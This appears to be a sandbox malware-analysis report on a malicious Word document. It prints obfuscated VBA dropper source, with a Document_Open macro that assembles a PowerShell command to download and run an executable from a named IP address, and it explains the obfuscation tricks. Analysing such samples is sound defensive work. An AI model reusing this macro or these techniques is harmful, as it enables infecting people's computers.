Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab0627dc6a400a26…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 244.5 KB
Created: 2018-07-11 06:54:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 2d6cbdc8b2c618eb4118cb58e440d582
SHA-1: 6e183439fd7ce5ce2bd1b300983129caa6f30695
SHA-256: ab0627dc6a400a2641f985c4bcc3785ce11456adcd9d9832e48574337adaf707
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample contains VBA macros, including a Document_Open handler that fires as soon as the document is opened with macros enabled and leads to a Shell() call. That Shell() command launches PowerShell, which downloads and executes a payload from http://185.189.255.137/payload.exe. The VBA source is obfuscated in a way that is easy to see in the preview below: every meaningful string is chopped into one- to three-character literals (plus Chr(43) for '+') and interleaved with never-assigned variable names, which are Variant/Empty and concatenate as "" under the + operator; the lines in between are arithmetic on the same undefined names and do nothing, with On Error Resume Next swallowing the resulting errors. Document_open passes the value returned by the function blZCdWHZO() to a helper outside the preview, so the command string is assembled in that function. The PowerShell stage adds its own layer: it spells iex as $ShellId[1]+$ShellId[13]+'x' ($ShellId is the string Microsoft.PowerShell, whose characters at index 1 and 13 are 'i' and 'e'), mangles the case of cmdlet and type names (which PowerShell ignores), and carries its real script as a System.IO.Compression.DeflateStream read back through a System.IO.StreamReader. Once the literals are folded the command is clear. A macro that hands a run-time-assembled PowerShell command to Shell() in order to fetch and run a remote executable is a strong indicator of a malicious document, most likely delivered as a spearphishing attachment.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro code calls Shell(), handing a string built at run time to the operating system for execution.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open handler is present, so the macro runs as soon as the document is opened with macros enabled (the extracted source shows Private Sub Document_open()).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This check catches p-code-only documents, and documents whose source extraction fails, where no readable source is available; here it corroborates the source-level findings.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that any Word document carries and is benign on its own; the download URL named in the summary is not present as a static string, it is only assembled at run time inside the macro.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  16991 bytes
SHA-256: 18cfd33f2f0148d0ff94bf3baa649a2e017bed46b84665ed0d7dbfdc86a4274f

Preview: first 1,000 lines of the extracted script (the listing is cut off below)
Attribute VB_Name = "RChzliW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   QrYck = 11882 / WjDwSN - (KhzaSW + sHkZCM)
   cYjoD = 64430 / nOFhfz - (mlXuM + akiFTp)
dzslqVsvKJ ("" + VQVECYJFNUv + CQjucDmVf + blZCdWHZO + DBZVs + roflTVj + jnXwjvQot + WGpNvbi + CfaHhJUkmk)
   jDXtiH = 59731 / HwjkK - (oGQUp + dSjCh)
   ObSFw = 85095 / iUNYKm - (zrSCiI + CshXTD)
End Sub


Attribute VB_Name = "jlhfpZul"
Function blZCdWHZO()
On Error Resume Next
dvWSK = (oPuhXq - aoGiRl)
   LlHYk = (FzbUuo - mzKsK)
iQuNbLv = "pow" + iwilHAUD + McZQOoNsCpFtz + "ers" + twqjbYzY + YoZkovqBi + "h" + AYrpDtw + oBacOBi + "ell" + TPDGCqA + OuOsSaEt + " " + qXfwYMYXNwVmQT + OztVBpPl + "&" + rwjAYUb + ioQfuiTmrmcd + " " + GLFzFwBHuOTVcn + BLlmNWwUzr + "( $" + YzHbvzc + VVifauBMY + "sh" + YSkQsJjjNlz + wjuGrZdLY + "el" + qCGmcwIbpCi + rjmPsbhVH + "Lid"
rzvUwY = 38481 / 952 + (FapCw - 13796 * 32357 - YYMTij)
oOkdmknNMS = "[1]" + NTwYJiiYvdBnc + dsIRtjSlKEzi + Chr(43) + "$" + MSfMKKADo + HiBdPpvHdqmXw + "SH" + uhlTMAa + KVaRGhZDNZmF + "El" + vPBaiXav + GQTRVjqjSSTtOd + "L" + QiKYczcaqDKawn + obLqOHidi + "Id" + zoBAXYiHrkIW + tbRYQkiJDFmSL + "[1" + AjqWNdlo + BNjQifFFDVjRF + "3]" + HqkwNFNAwr + ztKHnOkOW + Chr(43) + "'x" + YahMHMbjbXBFm + phnMhZaMFLtOt + "')(" + EwJwMWjsGo + cvwnXGuY + "n" + JQSzNbAOzij + CvooWIohY + "eW-" + wRHYVHwiR + tfOJFsrqocWbv + "Ob" + RYQOslFBzvUc + jBppNCJaNDwqh + "JE" + bpLfmqaNDlEod + lPzAEahmi + "cT " + qLMRBEjMYFI + AJnmEIOf + "s"
ShsjRO = 89938 / 7115 + (pMzOBl - 67446 * 99626 - QqIcS)
   vmvhZ = 53738 / 89717 + (MukJYR - 96483 * 56270 - fGuAu)
   VJIOW = 82339 / 80834 + (BfWcz - 42165 * 5788 - RVCHA)
HfXzYpBNDNw = "YS" + SMGwLwAAzuMQT + VEVHsvVd + "TE" + tcisfzvhVvJ + CFfVcFJmulNhD + "m." + jswjbUSTV + uQjzkwlKSC + "iO" + tYWqwrRLcU + cwaIZklJNIKsDw + "." + vsMQWTDLE + cEzranlVlX + "s" + iQDLkNdnBqBP + NbJvPDvQ + "t" + QQkFRbP + GdzSHTzbq + "re" + DhHRaJLqIYqS + vTdXVZaJvdiNJC + "Am" + cFzXCiJSf + ZjuQKtVMz + "rEA" + UsLtmin + JNrwlVi + "d" + KLsNKAaB + UnqdwYkELI + "ER" + fSHGMswfpKZ + HLHiLTkQTsMTk + "( " + ARXmQfjZFD + CiiKOqoqMdVA + "(" + OMavmbza + nnjIalBfXl + " ne"
jQabq = DdfXsw + fzPGc * 31349 - iqFnqO / CGiiK / VPlkw / 11079 * ublzFN
   ohwcvB = 21222 / 45505 + (WzERUw - 20243 * 32225 - ibDFX)
Tkkrmtukntt = "W" + MzcGlcpKnkbR + BoiZoQMfKW + "-" + DFIhdHiSuhFDls + wLicuEkJXoR + "Ob" + jmGkrZkBGH + icUiinwqljzst + "JE" + VzJoqOuNuzTuTp + DKoMcQatAVZmz + "cT" + qqbOCzSdZ + ZiLtdBMuv + " " + oVFYQoV + QHmcEraW + "s" + hPYNqshHrXZC + lCFJihiHkfw + "yS" + jplaqCJApPHOfi + RiNPHqBmRsK + "tE" + itPYzwSFzj + dwmzvwzzdTwk + "m.I" + tnzJzsCbKWspi + XUzNhitPo + "o" + KJvLwiVJFfGnlG + lPFFPPi + ".C"
lwoSkQ = irWdY + mRpnb * 10060 - ZXbWj / hPEVLp / nKcBtO / 84491 * ROkRbI
   hzNnT = NWRlE + DdWLnu * 73512 - potMNm / IrFFW / vWVzCK / 42189 * FjHJJd
   zWVJzX = nDitf + aNTZij * 33894 - NGCbHA / PivbpM / HAzGHu / 99150 * YmXmps
rKujzVni = "OM" + djWJfsFBaj + fMjhmIG + "PRe" + ljQfjEmCD + QSbYAlQiPw + "SsI" + LsZXbbXUjrK + FdvoTwWYqoNkHh + "On" + clSJGEnKjLafo + HjbuHUpvzF + ".d" + DMnTuWcDGs + BqkHIXqjDPFAj + "e" + XnpUEAjjztrjJ + RPBktRkinaOV + "F" + GnmIiFQRXdqSG + QrhYVzpzv + "LAT" + nFCupiRvqFE + GSAsXubLwTW + "e" + zwqRorPDRLOd + AKwIMSDR + "StR" + zbBRPqljKJhVFZ + IboGlOjja + "e"
wEFww = ULFBCw + kUXHZl * 97422 - YzcCs / kazoQ / HmnNu / 34359 * GKodz
   KJQdf = sTMpzo + ZiSidi * 9223 - qwKbd / LisSqO / aWufBc / 24484 * FYKnM
BjdlBnCX = "Am" + lADNbirYFc + NjlGNlj + "([" + jKMIZsAjVcVMvz + bohPOhkANwXZiQ + "s" + FXEqrFBqqokzYr + LKmwzKjwZLua + "y" + BEPVHXuiEVn + azkcWjnOXi + "sTe" + voGRfKa + nfkCjupcG + "M."
XKBKiF = mbVioJ + IkbNMs * 56481 - EipcY / hGiNPs / bvaiI / 16605 * iJWnm
   IlIBo = YuhNia + VMjoRY * 21051 - VJnSA / mlzlQ / GsKfF / 54166 * mjnCIE
cazkzWsd = "IO" + avssDVF + FhSEUrVZRW + "." + AiDjXTvMCqXHi + VWptVcFdbqAN + "M" + NU
... (truncated)